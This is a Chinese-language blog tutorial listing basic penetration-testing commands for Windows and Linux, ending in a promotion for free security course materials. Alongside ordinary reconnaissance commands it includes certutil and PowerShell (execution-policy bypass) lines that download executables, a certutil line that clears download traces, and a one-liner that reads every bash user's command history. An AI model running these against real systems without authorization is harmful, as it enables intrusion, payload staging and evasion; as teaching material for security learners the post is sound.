渗透常用基础命令（非常详细），零基础入门到精通，看这一篇就够了

本文链接：https://blog.youkuaiyun.com/weixin_46428928/article/details/144510360

渗透常用基础命令

一、Windows常用命令

查看当前用户：

whoami #显示当前用户
whoami /user #显示当前用户信息

目录切换相关：

cd  #显示当前所处路径
cd ../ #进入上级目录
cd path #进入指定路径

查看用户列表，用户组列表等命令：

net user #查看用户列表
net localgroup #查看用户组列表
net localgroup Administrators #查看管理组列表

信息收集相关：

whoami /priv #查看当前用户特权
systeminfo #查看系统信息
query user && quser #查看当前登录的用户
netstat -ano #查看系统开放的端口
ipconfig /all #查看ip地址和DNS信息
tasklist /svc #查看系统进程信息
tasklist /V && tasklist /V /FO CSV #列出详细的进程信息

下面展示部分命令执行的截图，就不一一进行展示了：

列出C盘中的用户文件夹：

dir /b c:\Users #列出Users文件夹

查看用于远程连接服务的3389端口：

for /f "tokens=2" %i in ('tasklist /FI "SERVICES eq TermService" /NH') do netstat -ano | findstr %i | findstr LISTENING

文件下载相关命令：

certutil下载文件:

certutil -urlcache -split -f http://127.0.0.1:xx/xx.exe c:\xx.exe

certutil删除记录:

certutil -urlcache -split -f http://127.0.0.1:xx/xx.exe delete

PowerShell下载文件：

powershell -nop -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://127.0.0.1/xx.exe','xx.exe')

二、Linux常用命令

查看当前用户：

whoami

查看当前路径：

pwd

列举目录下的文件：

ls #列举当前目录下的文件和目录
ls / #列举根目录
ls + path #列举指定目录下的文件和目录

查看文件内容：

cat xxx.txt #查看文件内容
tac xxx.txt #同上
nano xxx.txt #通过nano编辑器打开文件
vim xxx.txt #通过vim打开文件

查看当前ip：

ifconfig | /sbin/ifconfig | /sbin/ip a |ip a | ip addr  | /bin/busybox ifconfig | hostname -I

查看进程信息：

ps -ef | ps -aux #查看进程信息

Centos版本 ssh 登录日志：

grep 'Accepted' /var/log/secure | awk '{print $11}'

Ubuntu版本 ssh 登录日志：

grep 'Accepted' /var/log/auth.log | awk '{print $11}'

查看端口信息：

netstat -anplut

查看操作系统标识：

cat /etc/os-release

查看bash历史命令：

cat `cat /etc/passwd |grep /bin/bash | awk -F ":" '{print $6}' | sed 's/$/&\/.bash_history/g'`

以上是一些较为常见并且比较简单的系统命令，如果向了解更多的渗透命令，可以查看下面的一个网址提供的内容：

https://book.shentoushi.top/

零基础入门网络安全/黑客技术

【----帮助网安学习，以下所有学习资料文末免费领取！----】

> ① 网安学习成长路径思维导图
> ② 60+网安经典常用工具包
> ③ 100+SRC漏洞分析报告
> ④ 150+网安攻防实战技术电子书
> ⑤ 最权威CISSP 认证考试指南+题库
> ⑥ 超1800页CTF实战技巧手册
> ⑦ 最新网安大厂面试题合集（含答案）
> ⑧ APP客户端安全检测指南（安卓+IOS）